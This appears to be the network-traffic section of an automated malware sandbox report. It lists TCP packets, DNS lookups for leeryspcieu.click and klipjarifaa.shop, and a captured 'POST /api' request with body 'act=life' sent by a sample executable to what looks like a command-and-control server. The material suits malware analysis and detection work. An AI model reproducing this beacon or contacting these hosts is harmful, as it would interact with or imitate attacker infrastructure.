                                                                                                                                    Jan 1, 2025 16:54:14.743778944 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.743823051 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.743846893 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.743859053 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.743953943 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.746212959 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.746228933 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.746318102 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.746326923 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.746382952 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.763417959 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.763441086 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.763474941 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.763488054 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.763504028 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.763546944 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.763679981 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.763698101 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.763739109 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.763746023 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.763757944 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.763786077 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.763791084 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.763811111 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.763816118 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.763843060 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.763869047 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.764010906 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.764024973 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.764062881 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.764069080 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.764096022 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.764102936 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.765569925 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.765590906 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.765624046 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.765634060 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.765654087 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.765685081 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.765773058 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.765788078 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.765834093 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.765842915 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.765887022 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.768471956 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.832478046 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.832518101 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.832611084 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.832624912 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.832676888 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.834829092 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.834846973 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.834917068 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.834924936 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.852029085 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.852054119 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.852159977 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.852174044 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.852264881 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.852279902 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.852329969 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.852340937 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.852371931 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.852421999 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.852430105 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.852469921 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.852590084 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.852607012 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.852654934 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.852663040 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.852715015 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.854202986 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.854219913 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.854276896 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.854285002 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.854326963 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.854437113 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.854451895 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.854509115 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.854516029 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.854547977 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.857973099 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.980139017 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.980161905 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.980246067 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.980259895 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.980308056 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.980873108 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.980889082 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.980947018 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.980953932 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.980998993 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.985434055 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.985450029 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.985533953 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.985542059 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.985598087 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.985641003 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.985657930 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.985709906 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.985717058 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.985779047 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.985893011 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.985909939 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.985951900 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.985960007 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.985997915 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.986310959 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.986326933 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.986377954 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.986383915 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.986393929 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.986413002 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.986433029 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.986439943 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.986464977 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.986481905 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.986666918 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.986681938 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.986726046 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.986732960 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:14.986774921 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:14.991074085 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.068851948 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.068875074 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.068964005 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.068977118 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.069022894 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.069405079 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.069420099 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.069469929 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.069477081 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.069505930 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.069518089 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.074434996 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.074453115 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.074512005 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.074520111 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.074563026 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.077105045 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.077122927 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.077184916 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.077191114 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.077231884 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.077301979 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.077322006 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.077364922 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.077374935 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.077414036 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.077430964 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.077446938 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.077483892 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.077491045 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.077514887 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.077524900 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.077630997 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.077655077 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.077683926 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.077688932 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.077721119 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.077729940 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.077799082 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.077814102 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.077864885 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.077872038 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.077914000 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.079798937 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.157455921 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.157474995 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.157576084 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.157584906 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.157634020 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.158029079 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.158042908 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.158091068 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.158099890 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.158128977 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.158147097 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.162683010 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.162698030 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.162769079 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.162775993 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.162832975 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.163223982 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.163239956 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.163279057 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.163285017 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.163295031 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.163310051 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.163322926 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.163355112 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.163361073 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.163381100 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.163409948 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.163755894 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.163769960 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.163826942 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.163834095 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.163875103 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.163877010 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.163886070 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.163904905 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.163925886 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.163932085 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.163944960 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.164058924 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.164072990 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.164103985 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.164112091 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.164120913 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.164155960 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.168477058 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.246181011 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.246200085 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.246284008 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.246292114 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.246332884 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.246704102 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.246733904 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.246764898 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.246771097 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.246803045 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.246810913 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.251257896 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.251272917 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.251326084 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.251333952 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.251373053 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.251672983 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.251688957 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.251734018 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.251744032 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.251781940 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.251916885 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.251931906 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.251980066 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.251987934 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.252029896 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.252283096 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.252298117 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.252352953 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.252358913 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.252408028 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.252631903 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.252646923 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.252727032 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.252733946 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.252849102 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.252933025 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.252948999 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.253145933 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.253153086 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.253191948 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.257837057 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.334714890 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.334752083 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.334779024 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.334789038 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.334820032 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.334832907 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.334913969 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.337686062 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.337704897 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:15.337713003 CET49983443192.168.2.5188.114.97.3
                                                                                                                                    Jan 1, 2025 16:54:15.337718964 CET44349983188.114.97.3192.168.2.5
                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Jan 1, 2025 16:53:56.556869984 CET5192553192.168.2.51.1.1.1
                                                                                                                                    Jan 1, 2025 16:53:56.570777893 CET53519251.1.1.1192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:08.215223074 CET4952653192.168.2.51.1.1.1
                                                                                                                                    Jan 1, 2025 16:54:08.229155064 CET53495261.1.1.1192.168.2.5
                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                    Jan 1, 2025 16:53:56.556869984 CET192.168.2.51.1.1.10x9cadStandard query (0)leeryspcieu.clickA (IP address)IN (0x0001)false
                                                                                                                                    Jan 1, 2025 16:54:08.215223074 CET192.168.2.51.1.1.10xcdcStandard query (0)klipjarifaa.shopA (IP address)IN (0x0001)false
                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                    Jan 1, 2025 16:53:56.570777893 CET1.1.1.1192.168.2.50x9cadNo error (0)leeryspcieu.click172.67.219.133A (IP address)IN (0x0001)false
                                                                                                                                    Jan 1, 2025 16:53:56.570777893 CET1.1.1.1192.168.2.50x9cadNo error (0)leeryspcieu.click104.21.45.223A (IP address)IN (0x0001)false
                                                                                                                                    Jan 1, 2025 16:54:08.229155064 CET1.1.1.1192.168.2.50xcdcNo error (0)klipjarifaa.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                    Jan 1, 2025 16:54:08.229155064 CET1.1.1.1192.168.2.50xcdcNo error (0)klipjarifaa.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                    • leeryspcieu.click
                                                                                                                                    • klipjarifaa.shop
                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    0192.168.2.549975172.67.219.1334436464C:\Users\user\Desktop\qnUFsmyxMm.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2025-01-01 15:53:57 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 8
                                                                                                                                    Host: leeryspcieu.click
                                                                                                                                    2025-01-01 15:53:57 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                    Data Ascii: act=life
                                                                                                                                    2025-01-01 15:53:57 UTC1129INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 01 Jan 2025 15:53:57 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=hm3vnv3r1nqhhqusjmtd84q87n; expires=Sun, 27 Apr 2025 09:40:36 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wuA99IvtVhqk8OmR1qvAVLXkYMf2IaK8mNU0QCPgxRdD70ifjOtb%2BBXSOaCWvdHG73466mcOrEzY8%2FY79vv2rSn42Cw%2BYf0dN80eLVohAYlH2uby7B59IvLCug8k1YaGtIslqA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
